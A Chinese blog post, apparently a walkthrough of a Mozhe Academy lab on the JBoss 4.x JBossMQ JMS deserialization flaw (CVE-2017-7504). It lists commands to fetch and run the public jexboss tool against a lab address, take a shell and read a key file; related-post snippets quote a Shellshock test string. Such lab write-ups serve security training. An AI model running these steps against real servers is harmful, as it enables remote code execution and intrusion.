墨者JBoss 4.x JBossMQ JMS反序列化漏洞

最新推荐文章于 2023-12-19 16:45:06 发布
最新推荐文章于 2023-12-19 16:45:06 发布
阅读量209 收藏 1
点赞数
文章标签: git github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63283172/article/details/123516482
版权

解题思路:

1,你需要有python2 的环境,我的kali Linux上有,就直接在上面演示,按照顺序执行以下命令

## 克隆项目至本地
git clone https://github.com/joaomatosf/jexboss.git

##切换到项目目录中

cd jexboss

##安装项目所需要的依赖

pip2 install -r requires.txt

##攻击目标 

python2 jexboss.py -u http://124.70.71.251:49454/

接下来就是等待连接,这时会弹出是否攻击,输入yes

##进入shell界面,输入 cat  ../../../key.txt   拿到key

 

 

参考文献:随记(七):Jboss漏洞检测利用工具_XXR_Beta的博客-CSDN博客_jboss利用工具

m0_63283172
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
不忘初心,护天下安全!
09-18 591
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。JBoss AS 4.x及之前版本。成功利用漏洞执行命令。
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞(CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
墨者_JBoss 5.x / 6.x反序列化漏洞分析溯源
weixin_50698958的博客
10-20 355
靶场: https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe 背景介绍 JBoss 5.x / 6.x反序列化漏洞分析溯源 实训目标 1、了解JBoss 5.x / 6.x反序列化漏洞形成原理; 2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法; 解题方向 利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录; 解题思路: 访问JBoss漏洞页面,响应码..
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者安全专家 v3.7.2.9
03-12
4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
JBoss 4.x JBossMQ JMS反序列化漏洞分析溯源
ST0new的博客
09-05 1236
墨者学院 WEB安全 JBoss 4.x JBossMQ JMS反序列化漏洞分析溯源 漏洞成因 Red Hat JBoss Application Server 是一款基于JaveEE 的开源应用服务器,JBoss AS 4.x 及之前的版本中,JBoss实现过程的JMS over HTTP Invocation Layer 的HTTPserverLSeverILServlet.java文件存在反...
墨者学院中的一些漏洞复现
weixin_43940853的博客
09-15 623
Bash漏洞分析溯源 bash漏洞本质上是一个任意代码执行漏洞,是存在于linux命令行下的一种输出漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test 若存在该漏洞,正常情况下会输出(版本号小于bash 4.3的linux或者unix系统上执行以上命令) vulnerable this is a test 这里只是...
墨者学院和bug库的web题(很多都是以前做过的,现在在做一遍,正好总结了)
weixin_43940853的博客
07-08 260
老样子,上传一个php文件,无法成功 这个时候可以看到upload的后缀为.asp,考虑解析漏洞
JBoss漏洞反序列化漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 316
JBoss 4.x JBossMQ JMS反序列化漏洞(CVE-2017-7504) 适用范围: Jboss AS 4.x及之前版本 JBoss漏洞环境: Vulhub - Docker-Compose file for vulnerability environment JBoss漏洞验证: 访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 647
vulhub漏洞复现-jboss反序列化漏洞
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
最新发布
qq_42430287的博客
12-19 1204
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)复现
KaNongDD的博客
09-18 1384
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
(CVE-2017-7504)JBoss 4.x JBossMQ JMS 反序列化漏洞
weixin_45253622的博客
12-09 706
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) vulhub官方复现:https://vulhub.org/#/environments/jboss/CVE-2017-7504/ 漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ 实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值